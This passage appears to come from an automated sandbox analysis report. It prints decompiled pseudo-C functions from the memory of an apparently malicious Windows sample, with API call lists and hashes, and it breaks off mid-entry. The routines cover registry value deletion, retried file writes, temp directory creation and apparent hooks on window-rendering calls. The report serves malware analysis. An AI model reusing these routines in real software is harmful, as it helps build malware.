    • Opcode Fuzzy Hash: 86513f084deb74ac85c27ef12ef1d3b6135b7c2c306b57b0ff0ee37d446761b3
    • Instruction Fuzzy Hash: EA31F5317043116BE724DB55EC45FAB77E8EBC4704F80482EF644972D1DBB8A849CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00419A20(int __eax, struct HDC__* _a4) {
    				struct HDC__* _v24;
    				long _v40;
    				void* _v44;
    				void** _v48;
    				BITMAPINFO** _v52;
    				struct HDC__* _v56;
    				void* _t30;
    				struct HBITMAP__* _t40;
    				void* _t41;
    				int _t44;
    				signed int _t50;
    				struct HDC__* _t52;
    				struct HBITMAP__* _t55;
    				BITMAPINFO* _t56;
    				BITMAPINFO** _t58;
    
    				_t44 = __eax;
    				_t55 = 0;
    				_t56 = HeapAlloc( *0x42e6d4, 8, 0x42c);
    				if(_t56 == 0) {
    					L13:
    					if(_t44 != 0) {
    						DeleteObject(_t44);
    					}
    					return _t55;
    				}
    				_t56->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _t44, 0, 1, 0, _t56, 0) == 0) {
    					L12:
    					HeapFree( *0x42e6d4, 0, _t56);
    					goto L13;
    				}
    				_t52 = _v24;
    				if(GetDIBits(_t52, _t44, 0, 1, 0, _t56, 0) == 0) {
    					goto L12;
    				}
    				DeleteObject(_t44);
    				asm("cdq");
    				_t50 =  ~((_t56->bmiHeader.biHeight ^ _t52) - _t52);
    				_t44 = 0;
    				_t30 = (_t56->bmiHeader.biBitCount & 0x0000ffff) - 1;
    				_t56->bmiHeader.biHeight = _t50;
    				if(_t30 == 0) {
    					L7:
    					_t52 = 8;
    					_t56->bmiHeader.biClrUsed = _t44;
    					_t56->bmiHeader.biBitCount = 8;
    					_t56->bmiHeader.biClrImportant = _t44;
    					L8:
    					_t58 = _v52;
    					asm("cdq");
    					_t53 = _t52 & 0x00000007;
    					asm("cdq");
    					_t56->bmiHeader.biSizeImage = ((_t56->bmiHeader.biBitCount & 0x0000ffff) * _t56->bmiHeader.biWidth * _t50 + (_t52 & 0x00000007) >> 0x00000003 ^ _t53) - _t53;
    					_t56->bmiHeader.biCompression = _t44;
    					if(_t58 != _t44) {
    						 *_t58 = _t56;
    					}
    					_t40 = CreateDIBSection(_v56, _t56, _t44, _v48, _v44, _v40);
    					_t55 = _t40;
    					if(_t55 == 0 || _t58 == 0) {
    						goto L12;
    					} else {
    						return _t40;
    					}
    				}
    				_t41 = _t30 - 3;
    				if(_t41 == 0) {
    					goto L7;
    				}
    				if(_t41 == 0x14) {
    					_t56->bmiHeader.biBitCount = 0x20;
    				}
    				goto L8;
    			}



















    APIs
    • HeapAlloc.KERNEL32(?,00000008,0000042C,00000000,0042EEA0,73BBA520,00000000,004263BC,00000000,?,0042EEC0,00000000,00000000), ref: 00419A35
    • GetDIBits.GDI32(?,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00419A5D
    • GetDIBits.GDI32(?,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00419A73
    • DeleteObject.GDI32(00000000), ref: 00419A7E
    • CreateDIBSection.GDI32(?,00000000,00000000,?,?,?), ref: 00419B00
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00419B1A
    • DeleteObject.GDI32(00000000), ref: 00419B25
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: BitsDeleteHeapObject$AllocCreateFreeSection
    • String ID:
    • API String ID: 1563147186-0
    • Opcode ID: 9dc981f52386d3f76047173f63d54110160d8d0043ab4de156f398688af17960
    • Instruction ID: 402333894caf689d7fc3123f31c73ea50e6f536203bedcac24a4e64f26a6ef4b
    • Opcode Fuzzy Hash: 9dc981f52386d3f76047173f63d54110160d8d0043ab4de156f398688af17960
    • Instruction Fuzzy Hash: F1318EB5200741ABC7348F66ED98E677AE9EFC9740F04892EF686D6650D734EC40C768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0040DB30(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
    				void* _v4;
    				void* _v16;
    				void* _t18;
    				void* _t19;
    				void* _t26;
    				void* _t27;
    				void* _t34;
    				signed int _t50;
    				void* _t58;
    				char _t62;
    
    				_t62 = _a16;
    				if(_t62 <= 1) {
    					L20:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t18 = E0040C330();
    					_v4 = _t18;
    					if(_t18 == 0) {
    						goto L20;
    					} else {
    						_push(__esi);
    						_t50 = 1;
    						_a16 = 0;
    						if(_t62 <= 1) {
    							L17:
    							__eflags = _t18;
    							if(_t18 != 0) {
    								HeapFree( *0x42e6d4, 0, _t18);
    							}
    							_t19 =  *0x42d420; // 0x0
    							ReleaseMutex(_t19);
    							CloseHandle(_t19);
    							return 1;
    						} else {
    							while(1) {
    								_t58 = E004109D0( *((intOrPtr*)(_a12 + _t50 * 4)), 0, 0xffffffff);
    								if(_t58 == 0) {
    									break;
    								}
    								_push(_t58);
    								if(_a8 == 0) {
    									_push( &_v4);
    									_push(_a4);
    									_t34 = E004244A0(__eflags);
    								} else {
    									_push( &_v4);
    									_push(_a4);
    									_t34 = E004242F0(_a4);
    								}
    								if(_t34 != 0) {
    									_a16 = 1;
    								}
    								HeapFree( *0x42e6d4, 0, _t58);
    								_t50 = _t50 + 1;
    								if(_t50 < _t62) {
    									continue;
    								} else {
    									if(_a16 == 0) {
    										_t18 = _v4;
    										goto L17;
    									} else {
    										return E0040C3F0(_v4);
    									}
    								}
    								goto L21;
    							}
    							_t26 = _v4;
    							__eflags = _t26;
    							if(_t26 != 0) {
    								HeapFree( *0x42e6d4, 0, _t26);
    							}
    							_t27 =  *0x42d420; // 0x0
    							ReleaseMutex(_t27);
    							CloseHandle(_t27);
    							__eflags = 0;
    							return 0;
    						}
    					}
    				}
    				L21:
    			}














    APIs
      • Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
      • Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
      • Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,000000FF), ref: 0040DBC1
    • HeapFree.KERNEL32(?,00000000,?,00000000,000000FF), ref: 0040DBF2
    • ReleaseMutex.KERNEL32(00000000,00000000,000000FF), ref: 0040DBFC
    • CloseHandle.KERNEL32(00000000), ref: 0040DC03
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040DC25
    • ReleaseMutex.KERNEL32(00000000), ref: 0040DC2F
    • CloseHandle.KERNEL32(00000000), ref: 0040DC36
      • Part of subcall function 004109D0: WideCharToMultiByte.KERNEL32(77E49EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,77E49EB0,?,00411F1F,0000FDE9,00000000,00000000,00000000), ref: 00410A1C
      • Part of subcall function 004109D0: HeapAlloc.KERNEL32(?,00000008,00000005), ref: 00410A38
      • Part of subcall function 004109D0: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00410A6D
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeMutex$AllocByteCharCloseHandleMultiReleaseWide$CreateObjectSingleWait
    • String ID:
    • API String ID: 3208849178-0
    • Opcode ID: 1406900a1d69db63c5c14bff5a1ec97422740e65660f90341659712d1e2965dc
    • Instruction ID: a91b224ca0553d3d7ae6fb1dfc3652ef0c643f9a0758a27de6ecb65b2544d8cd
    • Opcode Fuzzy Hash: 1406900a1d69db63c5c14bff5a1ec97422740e65660f90341659712d1e2965dc
    • Instruction Fuzzy Hash: 7531E6726093115BD220EBA9AC84F6BB3E8AB89314F14457FF541E72C1CB79EC09C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C2B0(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				intOrPtr _v36;
    				void* __edi;
    				intOrPtr _t26;
    				struct HWND__* _t33;
    				signed int _t40;
    				signed int _t47;
    				RECT* _t60;
    				intOrPtr* _t64;
    				struct HWND__* _t66;
    				struct HWND__* _t68;
    				signed int _t70;
    				void* _t72;
    				signed int _t79;
    
    				_t72 = (_t70 & 0xfffffff8) - 0x18;
    				_t64 = __edx;
    				_t68 = __ecx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) != 0) {
    					_t26 =  *((intOrPtr*)(_t64 + 0x14));
    					_t47 =  *(_t26 + 0x24);
    					if((_t47 & 0x40000000) == 0) {
    						_t60 =  *_t64 + 0x24;
    						__eflags = _t60;
    					} else {
    						_t60 = _t64 + 4;
    					}
    					if((_t47 & 0x10000000) != 0) {
    						if((IntersectRect( &_v24, _t26 + 0x14, _t60) & 0xffffff00 | _t28 != 0x00000000) != 0) {
    							L8:
    							E0041C0F0(_t68,  *_t64, _t80, _t60,  *((intOrPtr*)(_t64 + 0x14)));
    							_v36 =  *_t64;
    							_v24.right =  *((intOrPtr*)(_t64 + 0x14));
    							_t33 = GetTopWindow(_t68);
    							if(_t33 != 0) {
    								_t66 = GetWindow(_t33, 1);
    								if(_t66 != 0) {
    									while(E0041C2B0(_t66, _t72 + 0x10) != 0) {
    										_t66 = GetWindow(_t66, 3);
    										if(_t66 != 0) {
    											continue;
    										}
    										goto L13;
    									}
    								}
    							}
    						} else {
    							if(IsRectEmpty( *((intOrPtr*)(_t64 + 0x14)) + 0x14) != 0) {
    								_t40 = IntersectRect( &_v24,  *((intOrPtr*)(_t64 + 0x14)) + 4, _t60);
    								_t79 = _t40;
    								_t80 = _t40 & 0xffffff00 | _t79 != 0x00000000;
    								if((_t40 & 0xffffff00 | _t79 != 0x00000000) != 0) {
    									goto L8;
    								}
    							}
    						}
    					}
    				}
    				L13:
    				return 1;
    			}


















    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$Intersect$EmptyInfo
    • String ID:
    • API String ID: 2997981859-0
    • Opcode ID: 5030d612428bcda4bef33d0ec00132053f65b79cd533423a9d9cd772359d3bb6
    • Instruction ID: fda41f8fbbc101be70c768c8ca0af515e48843358847e8d905eb06f2eefbb1ba
    • Opcode Fuzzy Hash: 5030d612428bcda4bef33d0ec00132053f65b79cd533423a9d9cd772359d3bb6
    • Instruction Fuzzy Hash: 6A21D1322403059BD720CF58DD91BABB3ECAF84714B054A1EFC92A7751DB38EC4687A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0040ED80(void* __eflags) {
    				char _v672;
    				char _v800;
    				short _v904;
    				short _v912;
    				short _v1000;
    				short _v1008;
    				void* _v1012;
    				char _v1013;
    				char _v1017;
    				void* __esi;
    				int* _t27;
    				char _t33;
    				signed int _t34;
    
    				E0041D150( &_v800);
    				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, 0);
    				E00424100(3,  &_v1012);
    				_v1017 = 0;
    				while(SHDeleteValueW(0x80000001,  &_v1000,  &_v904) == 0) {
    					Sleep(0x1f4);
    					_v1012 = 0x80000001;
    					_t27 = RegOpenKeyExW(0x80000001,  &_v1008, 0, 1,  &_v1012);
    					if(_t27 != 0) {
    						L6:
    						return 1;
    					} else {
    						_t34 = _t34 & 0xffffff00 | RegQueryValueExW(_v1012,  &_v912, _t27, _t27, _t27, _t27) == 0x00000000;
    						RegCloseKey(_v1012);
    						if(_t34 == 0) {
    							goto L6;
    						} else {
    							_t33 = _v1013 + 1;
    							_v1013 = _t33;
    							if(_t33 < 5) {
    								continue;
    							} else {
    								break;
    							}
    						}
    					}
    					L7:
    				}
    				return 0;
    				goto L7;
    			}

















    APIs
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • SHDeleteValueW.SHLWAPI(80000001,?,?,?,?,00000000,750D46D0,00000000,74B05970), ref: 0040EDE7
    • Sleep.KERNEL32(000001F4), ref: 0040EDF6
    • RegOpenKeyExW.ADVAPI32 ref: 0040EE13
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0040EE2A
    • RegCloseKey.ADVAPI32(?), ref: 0040EE3A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Value$CloseDeleteFromOpenQuerySleepString
    • String ID: pB
    • API String ID: 4264976084-3059159000
    • Opcode ID: e9f7229bbbfc3a02169ace064383ecb1397ef022780664c17851e15a951e2ec8
    • Instruction ID: 6ecfd818d699e99809ca1c013d5d3cd6fdf022374d3b4ff294c436ec0a0fe954
    • Opcode Fuzzy Hash: e9f7229bbbfc3a02169ace064383ecb1397ef022780664c17851e15a951e2ec8
    • Instruction Fuzzy Hash: 3321F272244341AFE310DB55EC40FFB77ACEBC4700F04482EFA84A2290D639A949CBB6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040EE70(WCHAR* __edi, void* _a4, long _a8, char _a12) {
    				long _v4;
    				char _v5;
    				long _t18;
    				long _t20;
    				signed char _t21;
    				void* _t23;
    				WCHAR* _t25;
    				void* _t26;
    
    				_t25 = __edi;
    				_v5 = 0;
    				while(1) {
    					SetFileAttributesW(_t25, 0x20);
    					_t20 = 0;
    					_t26 = CreateFileW(_t25, 0x40000000, 1, 0, 2, 0x80, 0);
    					if(_t26 == 0xffffffff) {
    						goto L9;
    					}
    					_t23 = _a4;
    					if(_t23 == 0) {
    						L5:
    						_t20 = 1;
    					} else {
    						_t18 = _a8;
    						if(_t18 == 0 || WriteFile(_t26, _t23, _t18,  &_v4, 0) != 0) {
    							goto L5;
    						}
    					}
    					CloseHandle(_t26);
    					if(_t20 != 1) {
    						SetFileAttributesW(_t25, 0x80);
    						DeleteFileW(_t25);
    					}
    					if(_t20 != 0) {
    						return 1;
    					} else {
    						goto L9;
    					}
    					L14:
    					L9:
    					if(_a12 != 0 || _v5 != 0xa) {
    						_t21 = _v5;
    						Sleep((_t21 & 0x000000ff) + 0x1388);
    						_v5 = _t21 + 1;
    						continue;
    					} else {
    						return 0;
    					}
    					goto L14;
    				}
    			}












    APIs
    • SetFileAttributesW.KERNEL32(?,00000020), ref: 0040EE84
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040EE9B
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040EEC2
    • CloseHandle.KERNEL32(00000000), ref: 0040EECF
    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040EEE0
    • DeleteFileW.KERNEL32(?), ref: 0040EEE3
    • Sleep.KERNEL32(-00001388), ref: 0040EF08
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Attributes$CloseCreateDeleteHandleSleepWrite
    • String ID:
    • API String ID: 1913434650-0
    • Opcode ID: 0544e090cb447befd51db35dbace06d106491ab817d270dc4ab25c07c2d43996
    • Instruction ID: 1bce0f8d5e844f86d384b1c48a149489a30c58b75bb0fd2e055d61d506319231
    • Opcode Fuzzy Hash: 0544e090cb447befd51db35dbace06d106491ab817d270dc4ab25c07c2d43996
    • Instruction Fuzzy Hash: D7115E302853047AE7205731DC45FBB7B989B92711F08492EF980B62D0C77D985AD3BE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415D50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v520;
    				short* _t19;
    				int _t20;
    				intOrPtr _t24;
    				int _t29;
    				char* _t32;
    				int _t36;
    
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v520) == 0) {
    					L10:
    					return 0;
    				} else {
    					SetFileAttributesW( &_v520, 0x80);
    					if(DeleteFileW( &_v520) == 0) {
    						goto L10;
    					} else {
    						_t24 = _a4;
    						_t36 = _a8 + 0xfffffffd;
    						_t32 = _t24 + 3;
    						_t19 = PathFindFileNameW( &_v520);
    						_t29 = 0;
    						if(_t19 != 0 &&  *_t19 != 0) {
    							do {
    								_t29 = _t29 + 1;
    							} while (_t19[_t29] != 0);
    						}
    						_t20 = WideCharToMultiByte(0, 0, _t19, _t29, _t32, _t36, 0, 0);
    						if(_t36 > 0) {
    							if(_t20 >= _t36) {
    								_t20 = 0;
    							}
    							_t32[_t20] = 0;
    						}
    						E00410820(_t24, "?T", 2);
    						 *((char*)(_t24 + 2)) = 0x5c;
    						return 1;
    					}
    				}
    			}











    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00415D6F
    • SetFileAttributesW.KERNEL32(00000080,00000080), ref: 00415D87
    • DeleteFileW.KERNEL32(?), ref: 00415D92
    • PathFindFileNameW.SHLWAPI(?), ref: 00415DB7
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00415DDC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 7182292117bbe9b93a277e95438b5ae66fc2e8906000bac0da5c5adbd3af40b6
    • Instruction ID: d4613d1d6abeb9f89cf73364457105ccd8868a99fd081a2bcbad2a65d7062fa3
    • Opcode Fuzzy Hash: 7182292117bbe9b93a277e95438b5ae66fc2e8906000bac0da5c5adbd3af40b6
    • Instruction Fuzzy Hash: 5911D631600310BBE734AB24DC49FDB7BA8AF84B50F44852AB559EB1D1E678D940C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041BDF1(void* __eax, struct HWND__* _a8, struct HRGN__* _a12, int _a16) {
    				intOrPtr _v4;
    				int _t26;
    				signed int _t27;
    				struct HWND__* _t32;
    				char* _t48;
    
    				_t32 = _a8;
    				if(__eax + 0x42e94b == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L7:
    					return GetUpdateRgn(_t32, _a12, _a16);
    				} else {
    					_t48 = TlsGetValue( *0x42eea4);
    					if(_t48 == 0 || _t32 !=  *((intOrPtr*)(_t48 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a12,  *(_t48 + 0xc),  *(_t48 + 0x10),  *(_t48 + 0x14),  *(_t48 + 0x18));
    						if(_v4 != 0) {
    							_t26 = SaveDC( *(_t48 + 8));
    							_t27 = SendMessageW(_t32, 0x14,  *(_t48 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t48 + 0x1c)) =  ~_t27 + 1;
    							RestoreDC( *(_t48 + 8), _t26);
    						}
    						 *_t48 = 1;
    						return 2;
    					}
    				}
    			}









    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BE0B
    • TlsGetValue.KERNEL32(?), ref: 0041BE1C
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 0041BE42
    • SaveDC.GDI32(?), ref: 0041BE54
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0041BE65
    • RestoreDC.GDI32(?,00000000), ref: 0041BE78
    • GetUpdateRgn.USER32 ref: 0041BE97
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: e33eede72da129707398d265acd7b33279bf41692119ea42fd821f670bfc7853
    • Instruction ID: d0dac86f0ebcc0d90c5613884d8334d313e4975614d43eedfb24edc0afd595ae
    • Opcode Fuzzy Hash: e33eede72da129707398d265acd7b33279bf41692119ea42fd821f670bfc7853
    • Instruction Fuzzy Hash: 6E111D726007019FD320DB65DD88E97B7E8EB98701F14891EF68697660C774E885CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041C670(signed int __eax, void* __edi, void* __esi) {
    				signed int _v4;
    				intOrPtr _t7;
    				intOrPtr _t8;
    				char _t10;
    				struct HINSTANCE__* _t13;
    				signed int _t16;
    				void* _t18;
    				void* _t21;
    
    				_t21 = __esi;
    				_t18 = __edi;
    				_t16 = __eax & 0x00000001;
    				if(_t16 == 0) {
    					_v4 = _t16;
    					_t13 = GetModuleHandleW(L"kernel32.dll");
    					if(_t13 == 0) {
    						L4:
    						if((_t13 & 0xffffff00 | _v4 != 0x00000000) != 0) {
    							 *0x42e8f8 =  *0x42e8f8 | 0x00000001;
    						}
    					} else {
    						_t13 = GetProcAddress(_t13, "IsWow64Process");
    						if(_t13 == 0) {
    							goto L4;
    						} else {
    							_t13 = _t13->i(0xffffffff,  &_v4);
    							if(_t13 != 0) {
    								goto L4;
    							}
    						}
    					}
    				}
    				_push(_t21);
    				_push(_t18);
    				_t7 = E00415510(0x42e930, 0x42e93c);
    				 *0x42e950 = _t7;
    				if(_t7 != 0) {
    					if(_t16 == 0) {
    						_push(0x42eb70);
    						E00416D20();
    					}
    					_t8 = E004104D0();
    					 *0x42eb60 = _t8;
    					if(_t8 < 2) {
    						goto L7;
    					} else {
    						_t10 = E00412A50();
    						 *0x42eb64 = _t10;
    						if(_t10 != 0) {
    							L14:
    							if(_t16 != 0 || _t10 >= 2) {
    								return 1;
    							} else {
    								goto L7;
    							}
    						} else {
    							if( *0x42eb60 >= 4) {
    								goto L7;
    							} else {
    								_t10 = 2;
    								 *0x42eb64 = 2;
    								goto L14;
    							}
    						}
    					}
    				} else {
    					L7:
    					return 0;
    				}
    			}












    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,0041CB8C,?,00000000), ref: 0041C682
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0041C692
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0B$<B$IsWow64Process$kernel32.dll
    • API String ID: 1646373207-706167745
    • Opcode ID: dce168075af999828b9bd68a349c531712020c14392055b812072d4fcef76847
    • Instruction ID: 89c729ec999a93abaca3a359321705bfbf6efdf599fc20fce41dff25afd514de
    • Opcode Fuzzy Hash: dce168075af999828b9bd68a349c531712020c14392055b812072d4fcef76847
    • Instruction Fuzzy Hash: FC114CB0781302AA9F20AB636CC57E72F897A51354760147FE452A72A1DB7CC4C2C63D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00427DB1(void* __eax, int _a8) {
    				void* __ebx;
    				long _t12;
    				intOrPtr _t17;
    				int _t24;
    				struct HWND__* _t38;
    
    				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					return SetCapture();
    				}
    				_t24 = _a8;
    				if(_t24 != 0) {
    					_t12 = GetCurrentThreadId();
    					_t34 = _t12;
    					if(_t12 != GetWindowThreadProcessId(_t24, 0)) {
    						return 0;
    					} else {
    						return E004272D0(_t24, 0x42eea0, _t34, 0, 0);
    					}
    				} else {
    					WaitForSingleObject( *0x42eeb4, 0xffffffff);
    					_t17 =  *0x42eeb0;
    					_t38 =  *(_t17 + 0x108);
    					 *(_t17 + 0x10c) = _t24;
    					 *( *0x42eeb0 + 0x108) = _t24;
    					 *((short*)( *0x42eeb0 + 0x110)) = 0;
    					ReleaseMutex( *0x42eeb4);
    					if(IsWindow(_t38) != 0) {
    						SendMessageW(_t38, 0x215, _t24, _t24);
    					}
    					return _t38;
    				}
    			}









    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00427DCC
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00427DE8
    • ReleaseMutex.KERNEL32(?), ref: 00427E1D
    • IsWindow.USER32(?), ref: 00427E24
    • SendMessageW.USER32(?,00000215,?,?), ref: 00427E36
    • GetCurrentThreadId.KERNEL32 ref: 00427E43
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00427E4E
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleThreadWaitWindow$CurrentMessageMutexProcessReleaseSend
    • String ID:
    • API String ID: 2977258062-0
    • Opcode ID: 1846223971732b21802f00a85ffb3b3977dd226544ea496044cdb2bb321f4f63
    • Instruction ID: 03d7464fe5a9512be97bb829366a3c1bf00cd9bf9ac45e19c4dccc4d2979ea1e
    • Opcode Fuzzy Hash: 1846223971732b21802f00a85ffb3b3977dd226544ea496044cdb2bb321f4f63
    • Instruction Fuzzy Hash: B41198727042209BD3209B65BC84BD77799BB18310F9645BBF504E73B1D7B49C418BAC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004182C0(WCHAR* __ebx) {
    				short _v520;
    				char _v1040;
    				void* __esi;
    				long _t8;
    				void* _t10;
    				signed int _t11;
    				WCHAR* _t16;
    				WCHAR* _t17;
    				void* _t20;
    				WCHAR* _t21;
    				void* _t23;
    
    				_t16 = __ebx;
    				_t23 =  &_v1040;
    				if(GetTempPathW(0xf6,  &_v520) - 1 > 0xf5) {
    					L12:
    					return 0;
    				} else {
    					_t20 = 0;
    					while(1) {
    						_t8 = GetTickCount();
    						if(_t8 !=  *0x42dd08) {
    							 *0x42dd08 = _t8;
    							E00412320(_t8);
    						}
    						_push(E00412360());
    						_push(L"tmp");
    						_t21 =  &_v1040;
    						_t10 = E00411D10(_t9, 0x104, _t21, L"%s%08x");
    						_t23 = _t23 + 0xc;
    						if(_t10 == 0xffffffff) {
    							goto L12;
    						}
    						_t17 = _t21;
    						while(1) {
    							_t11 =  *_t17 & 0x0000ffff;
    							if(_t11 != 0x5c && _t11 != 0x2f) {
    								break;
    							}
    							_t17 =  &(_t17[1]);
    						}
    						if(PathCombineW(_t16,  &_v520, _t17) == 0 || CreateDirectoryW(_t16, 0) == 0) {
    							_t20 = _t20 + 1;
    							if(_t20 < 0x64) {
    								continue;
    							} else {
    								goto L12;
    							}
    						} else {
    							return 1;
    						}
    						goto L14;
    					}
    					goto L12;
    				}
    				L14:
    			}















    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 004182D6
    • GetTickCount.KERNEL32 ref: 004182F0
    • PathCombineW.SHLWAPI(?,?,?), ref: 0041834C
    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00418359
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: 0d91bdbe08c78bcf7485725fab8d1d66fe13e3f12aca4c8c04d7478e417d3d91
    • Instruction ID: 569dce6fc8ab3a55e9de7b369f4fb0d0539646796b710b177d90b0dcd6d9f96f
